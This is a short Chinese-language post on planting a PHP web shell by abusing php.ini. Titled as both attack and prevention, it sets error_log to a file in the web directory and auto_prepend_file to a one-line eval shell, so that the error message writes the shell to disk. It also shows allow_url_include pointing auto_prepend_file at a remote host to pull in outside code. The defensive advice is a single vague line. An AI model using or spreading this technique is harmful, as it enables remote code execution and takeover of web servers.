利用php.ini拿shell及防范

 1.把error_log设置到web目录

~例如hackxl.php
2.auto_prepend_file设为一句话
~比如设为<?php eval($_REQUEST[#]);?>
3.然后访问任意php php文件后会因为找不到auto_prepend_file的文件而报错,而会产生报错；把<?php eval($_REQUEST[#]);?>写入了hackxl.php
auto_prepend_file指令的作用是包含文件可以像使用include()语句包含的文件一样；也就是，如果该文件不存在，将产生一个警告也就就报错。
不过php会对error输出作htmlentities()处理。
可以用
allow_url_include = on auto_prepend_file = ‘http://www.badguest.cn/s.txt’

安全方面平时注意检查就行了